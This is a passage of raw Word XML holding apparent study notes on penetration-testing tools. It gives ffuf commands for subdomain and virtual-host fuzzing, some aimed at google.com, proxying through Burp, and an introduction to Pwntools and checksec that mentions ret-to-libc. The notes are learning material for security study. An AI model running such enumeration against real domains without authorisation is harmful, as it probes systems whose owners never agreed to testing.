    <w:p w14:paraId="70B297DD" w14:textId="27A089DC" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D582D4" w14:textId="249DBBBB" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00841BBA">
        <w:t xml:space="preserve"> -u http://FUZZ.tryhackme.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237BA9E" w14:textId="4BE118FF" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>some virtual hosts may exist with private subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588D092" w14:textId="3397ED06" w:rsidR="00841BBA" w:rsidRDefault="00841BBA" w:rsidP="00841BBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use Host HTTP header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290420D3" w14:textId="77777777" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u http://FUZZ.google.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CD558" w14:textId="30D26F87" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u http://google.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.google.com' -fs 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D6650" w14:textId="67BD6BAD" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use drill or dig to find IP address of root domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8C6E1" w14:textId="5E7F85E9" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can force with curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C169163" w14:textId="77777777" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>$ curl --resolve aol.google.com:443:216.58.198.206 https://aol.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D44593" w14:textId="77777777" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;!doctype html&gt;&lt;html </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>itemscope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>itemtype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="http://schema.org/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebPage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" lang="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4116E8" w14:textId="07834684" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5234DCC4" w14:textId="280FCA16" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proxifying</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C88942" w14:textId="2BEDBA1A" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>send traffic through a web proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381EE08" w14:textId="6BAC5D76" w:rsidR="000F63CB" w:rsidRPr="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://MACHINE_IP/ -c -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">/Discovery/Web-Content/common.txt -x </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8080</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E8A7B37" w14:textId="268DC6C9" w:rsidR="000F63CB" w:rsidRPr="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>send only matches to proxy for replaying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D725601" w14:textId="25A7EF56" w:rsidR="000F63CB" w:rsidRPr="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://FUZZ.tryhackme.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -replay-proxy </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8080</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="315AFC62" w14:textId="1BBC7E19" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E54E2" w14:textId="62554CE0" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586013A6" w14:textId="34820290" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA92813" w14:textId="364798A6" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A942609" w14:textId="7083D712" w:rsidR="000F63CB" w:rsidRDefault="000F63CB" w:rsidP="000F63CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDEC966" w14:textId="215AC454" w:rsidR="000F63CB" w:rsidRDefault="001324E6" w:rsidP="000F63CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intro the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18D1B348" w14:textId="322A8692" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="000F63CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24796C24" w14:textId="7D07FB97" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290D847" w14:textId="6D3405A7" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a CTF framework and exploit development library written in python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A400A1" w14:textId="0E8B6B91" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rapid prototyping and development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDDA910" w14:textId="3A32C609" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidRPr="00FE632C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Gallopsled/pwntools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60F8631D" w14:textId="3D0B3CF2" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Tools and Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DF0A5" w14:textId="67DE47B7" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidRPr="00FE632C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.pwntools.com/en/stable/install.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24138439" w14:textId="5B55E994" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09EEC4A9" w14:textId="346FDE2B" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GDB plug-in that makes debugging with GDB suck less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AAF38F" w14:textId="1FF97EBF" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId80" w:history="1">
        <w:r w:rsidRPr="00FE632C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/pwndbg/pwndbg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E5378A1" w14:textId="5A444030" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Checksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="075F4DE7" w14:textId="075A942D" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F32950" w14:textId="61FDA5B2" w:rsidR="001324E6" w:rsidRDefault="001324E6" w:rsidP="001324E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>returns file architecture (such as i386)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA92C7" w14:textId="4B0BCED6" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RELRO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AB5E5" w14:textId="43970364" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Relocation Read-Only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1369DFFC" w14:textId="4CA4811A" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>makes global offset table read-only after the linker resolves functions to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF99D1B" w14:textId="61576F94" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">important for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090FB78" w14:textId="392D54C6" w:rsidR="00756967" w:rsidRDefault="00756967" w:rsidP="00756967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
